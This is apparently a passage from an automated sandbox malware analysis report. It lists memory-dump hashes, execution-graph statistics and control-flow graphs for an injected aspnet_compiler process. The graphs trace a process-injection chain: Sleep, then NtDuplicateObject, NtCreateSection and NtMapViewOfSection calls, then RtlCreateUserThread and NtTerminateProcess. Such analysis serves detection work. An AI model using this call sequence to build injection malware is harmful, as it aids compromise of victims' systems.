                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7518DB4600204DFDB15CB94C890AAEBBF2FF89324F5581A9D5456F391CB72DC85CBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 36a0b9806243fb55e2b6485ce4705b6de7275330f958a2cfe858efb2a5d45c21
                                                                                                                                                                                                                              • Instruction ID: 9d1476941929848c0ace36a4310ec838d37e2f15c2d876f32ae82112a0635bf5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36a0b9806243fb55e2b6485ce4705b6de7275330f958a2cfe858efb2a5d45c21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02517CB4B00204CFDB14CB98C554BAEBBF2BB88324F5481A8D5456F3A5CB72DC85CBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2096321098.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2a8d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: cf83c60e1b5716cb2e92670de3a93556df9722b52beb854412fc96c77b7fc2b7
                                                                                                                                                                                                                              • Instruction ID: 925c0044a69719e64f5dca9518ffa131fe6bffcdcd056555b6d2398548f2af1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf83c60e1b5716cb2e92670de3a93556df9722b52beb854412fc96c77b7fc2b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3018C6240D3C09FD7124B258C94762BFB8EF53224F0984CBE8898F1A3C6699C45CB72
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2096321098.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2a8d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5ce52aeab551bf1b76e8c41a02ca9d64f41a9b6c81998a8a6e86d56ca17311a0
                                                                                                                                                                                                                              • Instruction ID: 1e17304cd657ab002c2bc3444eb9fc7d5cb3d8ea60e2f198237967be5dd5d70d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ce52aeab551bf1b76e8c41a02ca9d64f41a9b6c81998a8a6e86d56ca17311a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB01F2310097449AE710AF39CDC4B67BFB8EF41324F08C42AED0A4A286CB799841C6B1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-788909730
                                                                                                                                                                                                                              • Opcode ID: 8eaa0f5f5482f5c380fa37b08de178ee2ce29281ca996305f4ed7ef5c24838fd
                                                                                                                                                                                                                              • Instruction ID: ef79dc151d05e6ba266fd713d64dc8ff2e11ec2cb718d93a93db4eaeb9e1a01d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8eaa0f5f5482f5c380fa37b08de178ee2ce29281ca996305f4ed7ef5c24838fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01C136F1A0430DDFDB258B69D84476EBBE6AFC6310F24816EE815CB352DA72C846C791
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                                                                                              • Opcode ID: bf11918cbb7d1267e4431496d7d031c8c06735dc81d3845b0fc7e6a9b04beb56
                                                                                                                                                                                                                              • Instruction ID: d7157f6c7484404e6324a0331d9bd9fe1f50289afb79bc0d2569df9f1fe47c19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf11918cbb7d1267e4431496d7d031c8c06735dc81d3845b0fc7e6a9b04beb56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF01F76164E3C58FD72B53285C2056A6FB65FC3600B2A46EBD080DF3A7DD594D4AC3A2

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:8.4%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:57.1%
                                                                                                                                                                                                                              Total number of Nodes:56
                                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                                              execution_graph 2067 402d65 2069 402d69 2067->2069 2068 4018a6 8 API calls 2070 402ea5 2068->2070 2069->2068 2069->2070 2145 4018b1 2146 401903 2145->2146 2148 4018b5 2145->2148 2147 4014bf 7 API calls 2146->2147 2150 40191a 2146->2150 2147->2150 2149 4018ee Sleep 2148->2149 2149->2146 2091 4014d6 2092 4014c4 2091->2092 2093 40156f NtDuplicateObject 2092->2093 2102 40168b 2092->2102 2094 40158c NtCreateSection 2093->2094 2093->2102 2095 4015b2 NtMapViewOfSection 2094->2095 2096 40160c NtCreateSection 2094->2096 2095->2096 2097 4015d5 NtMapViewOfSection 2095->2097 2098 401638 2096->2098 2096->2102 2097->2096 2099 4015f3 2097->2099 2100 401642 NtMapViewOfSection 2098->2100 2098->2102 2099->2096 2101 401669 NtMapViewOfSection 2100->2101 2100->2102 2101->2102 2063 402f5d 2064 4030b4 2063->2064 2065 402f87 2063->2065 2065->2064 2066 403042 RtlCreateUserThread NtTerminateProcess 2065->2066 2066->2064 2037 402dfe 2038 402dee 2037->2038 2040 402ea5 2038->2040 2041 4018a6 2038->2041 2042 4018b7 2041->2042 2043 4018ee Sleep 2042->2043 2044 401903 2043->2044 2046 40191a 2044->2046 2047 4014bf 2044->2047 2046->2040 2048 4014ce 2047->2048 2049 40156f NtDuplicateObject 2048->2049 2055 40168b 2048->2055 2050 40158c NtCreateSection 2049->2050 2049->2055 2051 4015b2 NtMapViewOfSection 2050->2051 2052 40160c NtCreateSection 2050->2052 2051->2052 2053 4015d5 NtMapViewOfSection 2051->2053 2054 401638 2052->2054 2052->2055 2053->2052 2056 4015f3 2053->2056 2054->2055 2057 401642 NtMapViewOfSection 2054->2057 2055->2046 2056->2052 2057->2055 2058 401669 NtMapViewOfSection 2057->2058 2058->2055 2151 4018be 2152 4018b7 2151->2152 2153 4018ee Sleep 2152->2153 2154 401903 2153->2154 2155 4014bf 7 API calls 2154->2155 2156 40191a 2154->2156 2155->2156 2059 4030bf 2060 403055 RtlCreateUserThread NtTerminateProcess 2059->2060 2062 4030d1 2059->2062 2061 4030b4 2060->2061 2062->2062

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 29 401874-40187f 20->29 30 401886-4018a3 call 401164 20->30 21->22 31 40156f-401586 NtDuplicateObject 21->31 22->20 29->30 31->22 33 40158c-4015b0 NtCreateSection 31->33 35 4015b2-4015d3 NtMapViewOfSection 33->35 36 40160c-401632 NtCreateSection 33->36 35->36 37 4015d5-4015f1 NtMapViewOfSection 35->37 36->22 38 401638-40163c 36->38 37->36 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->36 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1652636561-0
                                                                                                                                                                                                                              • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                                                                                              • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 76 401874-40187f 67->76 77 401886-4018a3 call 401164 67->77 68->69 78 40156f-401586 NtDuplicateObject 68->78 69->67 76->77 78->69 80 40158c-4015b0 NtCreateSection 78->80 82 4015b2-4015d3 NtMapViewOfSection 80->82 83 40160c-401632 NtCreateSection 80->83 82->83 84 4015d5-4015f1 NtMapViewOfSection 82->84 83->69 85 401638-40163c 83->85 84->83 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->83 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                                                                                                              • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                                                                                              • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 119 401874-40187f 110->119 120 401886-4018a3 call 401164 110->120 111->112 121 40156f-401586 NtDuplicateObject 111->121 112->110 119->120 121->112 123 40158c-4015b0 NtCreateSection 121->123 125 4015b2-4015d3 NtMapViewOfSection 123->125 126 40160c-401632 NtCreateSection 123->126 125->126 127 4015d5-4015f1 NtMapViewOfSection 125->127 126->112 128 401638-40163c 126->128 127->126 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->126 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                                                                                                              • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                                                                                              • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 159 401874-40187f 150->159 160 401886-4018a3 call 401164 150->160 151->152 161 40156f-401586 NtDuplicateObject 151->161 152->150 159->160 161->152 163 40158c-4015b0 NtCreateSection 161->163 165 4015b2-4015d3 NtMapViewOfSection 163->165 166 40160c-401632 NtCreateSection 163->166 165->166 167 4015d5-4015f1 NtMapViewOfSection 165->167 166->152 168 401638-40163c 166->168 167->166 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->166 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                                                                                                              • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                                                                                              • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                                                                              • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                                                                                                              • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                                                                                              • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                              • String ID: zOji
                                                                                                                                                                                                                              • API String ID: 4152845823-4118548424
                                                                                                                                                                                                                              • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                                                                                              • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                                              • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                                                                                              • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                                              • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                                                                                              • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
